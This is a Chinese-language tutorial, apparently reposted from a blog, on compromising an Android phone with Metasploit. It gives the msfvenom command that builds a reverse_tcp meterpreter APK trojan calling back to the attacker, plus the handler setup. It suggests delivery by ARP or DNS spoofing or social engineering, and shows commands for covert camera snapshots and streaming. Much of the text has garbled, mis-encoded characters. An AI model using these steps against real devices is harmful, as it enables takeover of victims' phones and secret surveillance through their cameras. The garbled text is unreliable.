MSF是Metasploit的簡稱,Metasploit是一款開源的安全漏洞檢測工具,非常強(qiáng)大,分別有Windows版和Linux版,工具里集成了許多微軟公布的漏洞(0day)。
我這里做測試的系統(tǒng)是Backbox linux ,這是一款網(wǎng)絡(luò)滲透,信息安全評(píng)估系統(tǒng)。里邊安裝了許許多多的工具。其中MSF就自帶有。當(dāng)然還有其它的 比如Kali linux 、Back Track這些等等。
環(huán)境:Backbox linux+MSF
目標(biāo):一臺(tái)安卓手機(jī)
既然是入侵安卓手機(jī),肯定要先配置一個(gè)安卓木馬,那我們看看本機(jī)的IP?
本機(jī)IP:192.168.1.6
在到終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
以前的MSF老版本是用msfpayload生成木馬 現(xiàn)在在新版本中都用msfvenom代替了,所以有些朋友在終端輸入msfpayload的時(shí)候 會(huì)提示
msfpayload無法找到命令 所以使用msfvenom即可,這里L(fēng)HOST 對應(yīng)的是本機(jī)的IP地址 LPORT對應(yīng)你要監(jiān)聽的端口 然后生成木馬的路徑
這樣我們就在/root/路徑下生成了一個(gè)APK的安卓木馬文件,至于木馬的免殺暫且不談?,F(xiàn)在我們在來啟動(dòng)MSF工具
輸入命令:msfconsole
然后輸入:
1. use exploit/multi/handler 加載模塊
2.?set payload android/meterpreter/reverse_tcp ?選擇Payload
3.show options 查看參數(shù)設(shè)置
我們看見payload里邊有兩個(gè)參數(shù)要設(shè)置 LHOST和LPORT 表示地址和端口 默認(rèn)的端口是4444 現(xiàn)在我們來更改設(shè)置
1.set LHOST 192.168.1.6 這里的地址設(shè)置成我們剛才生成木馬的IP地址
2.set LPORT 5555 這里的端口設(shè)置成剛才我們生成木馬所監(jiān)聽的端口
3.exploit 開始執(zhí)行漏洞 開始監(jiān)聽...
OK,一切準(zhǔn)備工作準(zhǔn)備就緒。?!,F(xiàn)在要做的就是把木馬文件搞到人家的手機(jī)上,思路有很多 可以DNS arp劫持欺騙 只要對方用手機(jī)下載文件 就會(huì)下載我們的木馬文件
還有社工什么等等的,這里我就簡單的把木馬文件弄我自己的手機(jī)上做測試
安裝完成后 會(huì)在桌面上生成一個(gè)MainActivity的程序圖標(biāo) 這個(gè)就是我們剛才生成的木馬 當(dāng)我們點(diǎn)擊了這個(gè)圖標(biāo) 手機(jī)會(huì)沒有任何反應(yīng) 其實(shí)木馬已經(jīng)開始運(yùn)行起來了
我們可以在我們的MSF里看見有一個(gè)會(huì)話連接了
這樣對方的手機(jī)就就被我們控制了,查看手機(jī)系統(tǒng)信息,輸入命令 sysinfo
webcam_list查看手機(jī)攝影頭有幾個(gè) 這里顯示兩項(xiàng) 分別表示有前后兩個(gè)攝像頭
?webcam_snap 隱秘拍照功能
后邊跟上參數(shù)-i 指定使用那個(gè)攝像頭拍照
可以看見我們分別對前后攝像頭都拍了照 保存到了桌面上
還可以輸入命令?webcam_stream 開啟攝像頭?文章來源:http://www.zghlxwxcb.cn/news/detail-460590.html
其它的功能還有更多 。暫時(shí)就先到這吧。。。
搜集整理的學(xué)習(xí)路線&筆記https://mp.weixin.qq.com/s/KQx_eIwdjCj3QdErxKb7ZQ文章來源地址http://www.zghlxwxcb.cn/news/detail-460590.html
到了這里,關(guān)于MSF入侵安卓手機(jī)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!